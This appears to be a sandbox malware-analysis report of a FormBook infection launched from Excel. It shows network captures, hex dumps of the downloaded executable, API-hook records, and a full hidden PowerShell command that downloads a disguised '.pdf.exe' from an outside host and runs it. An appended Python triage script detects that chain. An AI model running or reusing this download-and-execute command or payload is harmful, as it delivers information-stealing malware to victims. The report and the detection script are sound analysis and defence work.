                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PNo @ @nW H.textTO P `.rsrcR@@.relocn@B0oHJh$00-&(+&+*03(-&-&-&(+(+(+(+*0 -&s-&sX-&o++++(oj2+(rpH((*o[ot+}*0 {rpo-&&+}+*0u{(-&~-I++ r_p(-&((( -&+++~{!~o"*0',{,{o#-&&+($+*0J


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              1           192.168.2.3  49744        162.223.88.131  80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Nov 27, 2020 11:38:08.898339987 CET  4976                OUT        GET /js/2Q/5901777.pdf.exe HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                              Host: sparepartiran.com
                                              Connection: Keep-Alive
                                              Nov 27, 2020 11:38:09.019684076 CET  4992                IN         HTTP/1.1 200 OK
                                              Date: Fri, 27 Nov 2020 10:38:08 GMT
                                              Server: Apache
                                              Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 552960
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 
19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26 7e 04 00 00 04 2d 49 2b 03 0a 2b f4 20 00 01 00 00 72 5f 00 00 70 14 d0 06 00 00 02 28 19 00 00 0a 17 8d 02 00 00 01 18 2d 1c 26 07 16 16 14 28 1e 00 00 0a a2 07 28 1f 00 00 0a 28 20 00 00 0a 15 2d 06 26 2b 0a 0b 2b e2 80 04 00 00 04 2b 00 7e 04 00 00 04 7b 21 00 00 0a 7e 04 00 00 04 06 6f 22 00 00 0a 2a 00 00 00 03 30 09 00 27 00 00 00 00 00 00 00 03 2c 13 02 7b 03 00 00 04 2c 0b 02 7b 03 00 00 04 6f 23 00 00 0a 02 03 17 2d 04 26 26 2b 07 28 24 00 00 0a 2b 00 2a 00 03 30 09 00 4a 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PNo @ @nW H.textTO P `.rsrcR@@.relocn@B0oHJh$00-&(+&+*03(-&-&-&(+(+(+(+*0 -&s-&sX-&o++++(oj2+(rpH((*o[ot+}*0 {rpo-&&+}+*0u{(-&~-I++ r_p(-&((( -&+++~{!~o"*0',{,{o#-&&+($+*0J


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name  Hook Type  Active in Processes
                                              PeekMessageA   INLINE     explorer.exe
                                              PeekMessageW   INLINE     explorer.exe
                                              GetMessageW    INLINE     explorer.exe
                                              GetMessageA    INLINE     explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name  Hook Type  New Data
                                              PeekMessageA   INLINE     0x48 0x8B 0xB8 0x81 0x1E 0xE0
                                              PeekMessageW   INLINE     0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageW    INLINE     0x48 0x8B 0xB8 0x89 0x9E 0xE0
                                              GetMessageA    INLINE     0x48 0x8B 0xB8 0x81 0x1E 0xE0

                                              Statistics

                                              Behavior

                                              System Behavior

General

Start time: 11:36:38
Start date: 27/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x12f0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:38:01
Start date: 27/11/2020
Path: C:\Windows\splwow64.exe
Wow64 process (32bit): false
Commandline: C:\Windows\splwow64.exe 12288
Imagebase: 0x7ff704f00000
File size: 130560 bytes
MD5 hash: 8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:38:04
Start date: 27/11/2020
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Imagebase: 0x7ff785e30000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 11:38:04
Start date: 27/11/2020
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Imagebase: 0x7ff785e30000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 11:38:04
Start date: 27/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:38:05
Start date: 27/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:38:09
Start date: 27/11/2020
Path: C:\Users\Public\oftmhayq.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\oftmhayq.exe'
Imagebase: 0x7c0000
File size: 552960 bytes
MD5 hash: 7E26E87AB642008D934824D509559859
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 11:38:11
Start date: 27/11/2020
Path: C:\Users\Public\oftmhayq.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\oftmhayq.exe'
Imagebase: 0xfa0000
File size: 552960 bytes
MD5 hash: 7E26E87AB642008D934824D509559859
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:38:34
Start date: 27/11/2020
Path: C:\Users\Public\oftmhayq.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\oftmhayq.exe
Imagebase: 0x870000
File size: 552960 bytes
MD5 hash: 7E26E87AB642008D934824D509559859
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:38:35
Start date: 27/11/2020
Path: C:\Users\Public\oftmhayq.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\oftmhayq.exe
Imagebase: 0x8a0000
File size: 552960 bytes
MD5 hash: 7E26E87AB642008D934824D509559859
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:38:37
Start date: 27/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:38:39
Start date: 27/11/2020
Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
Imagebase: 0x70000
File size: 552960 bytes
MD5 hash: 7E26E87AB642008D934824D509559859
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
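The process records above contain the whole delivery chain in a form a responder can check mechanically: a hidden PowerShell with the execution policy bypassed fetches a double-extension file (5901777.pdf.exe) into C:\Users\Public and starts it, the dropped binary runs from that user-writable folder, and the same MD5 (7E26E87AB642008D934824D509559859) later runs as vlc.exe under the user's Start Menu folder. The script below is an added example, not part of the report or of Joe Sandbox's signature engine, that applies those three checks to the records as transcribed from the General tables. The regular expressions, the directory list and the field names are this example's own assumptions; parent-process relationships are not in these records, so no parent check is made.

```python
"""
Added example (not from the Joe Sandbox report): three triage checks over the
process records in the behaviour section. PROCS entries are transcribed from the
General tables (start time, image path, command line, MD5); the indicators are
this example's own assumptions rather than the sandbox's rule set.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Proc:
    start: str
    path: str
    cmdline: str
    md5: str


PS_CRADLE = (r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr "
             r"http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; "
             r"& {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'")
PAYLOAD = r"C:\Users\Public\oftmhayq.exe"
VLC = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
PAYLOAD_MD5 = "7E26E87AB642008D934824D509559859"

PROCS: List[Proc] = [   # transcribed from the report's General tables
    Proc("11:36:38", r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
         r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding",
         "5D6638F2C8F8571C593999C58866007E"),
    Proc("11:38:01", r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288",
         "8D59B31FF375059E3C32B17BF31A76D5"),
    Proc("11:38:04", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CRADLE,
         "95000560239032BC68B4C2FDFCDEF913"),
    Proc("11:38:04", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CRADLE,
         "95000560239032BC68B4C2FDFCDEF913"),
    Proc("11:38:04", r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496"),
    Proc("11:38:05", r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "EA777DEEA782E8B4D7C7C33BBF8A4496"),
    Proc("11:38:09", PAYLOAD, f"'{PAYLOAD}'", PAYLOAD_MD5),
    Proc("11:38:11", PAYLOAD, f"'{PAYLOAD}'", PAYLOAD_MD5),
    Proc("11:38:34", PAYLOAD, PAYLOAD, PAYLOAD_MD5),
    Proc("11:38:35", PAYLOAD, PAYLOAD, PAYLOAD_MD5),
    Proc("11:38:37", r"C:\Windows\explorer.exe", "", "AD5296B280E8F522A8A897C96BAB0E1D"),
    Proc("11:38:39", VLC, f"'{VLC}'", PAYLOAD_MD5),
]

# Indicators: assumptions of this example, not the sandbox's signature logic.
DOWNLOAD_VERB = re.compile(r"\b(iwr|Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer|curl|wget)\b", re.I)
POLICY_BYPASS = re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I)
HIDDEN_WINDOW = re.compile(r"-(WindowStyle|w)\s+Hidden", re.I)
URL_RE = re.compile(r"https?://[^\s'\"};]+", re.I)
OUTFILE_RE = re.compile(r"-OutFile\s+['\"]?([^\s'\"};]+)", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|xlsx|jpg|png|txt)\.(exe|scr|com|dll|js)$", re.I)
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\", "\\temp\\", "c:\\programdata\\")


def find_download_cradles(procs: List[Proc]) -> List[Dict[str, object]]:
    """PowerShell started with the policy bypassed, fetching a URL to disk and running it."""
    hits = []
    for p in procs:
        cl = p.cmdline
        if "powershell" not in p.path.lower() or not (DOWNLOAD_VERB.search(cl) and POLICY_BYPASS.search(cl)):
            continue
        url, out = URL_RE.search(cl), OUTFILE_RE.search(cl)
        hits.append({
            "start": p.start,
            "hidden": bool(HIDDEN_WINDOW.search(cl)),
            "url": url.group(0) if url else None,
            "outfile": out.group(1) if out else None,
            "double_extension": bool(url and DOUBLE_EXT.search(url.group(0))),
            "runs_download": bool(out and "start-process" in cl.lower()),
        })
    return hits


def find_user_writable_exec(procs: List[Proc]) -> List[Proc]:
    """Images executing from directories any user can write to (here C:\\Users\\Public and AppData)."""
    return [p for p in procs if any(d in p.path.lower() for d in USER_WRITABLE)]


def find_same_hash_different_paths(procs: List[Proc]) -> Dict[str, List[str]]:
    """One file hash under more than one path: the payload re-appears as vlc.exe under the Start Menu."""
    by_hash: Dict[str, set] = defaultdict(set)
    for p in procs:
        by_hash[p.md5].add(p.path)
    return {h: sorted(paths) for h, paths in by_hash.items() if len(paths) > 1}


if __name__ == "__main__":
    for hit in find_download_cradles(PROCS):
        print("download cradle:", hit)
    for p in find_user_writable_exec(PROCS):
        print("user-writable exec:", p.start, p.path)
    for h, paths in find_same_hash_different_paths(PROCS).items():
        print("same hash, different paths:", h, paths)
```

The three functions return structured results rather than printing, so the same logic can be fed from an EDR process-creation export instead of the transcribed list. Note that the hash check is what exposes the vlc.exe copy: by name and location it looks like a legitimate media player shortcut target, and only the MD5 ties it to the file dropped by the PowerShell cradle.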
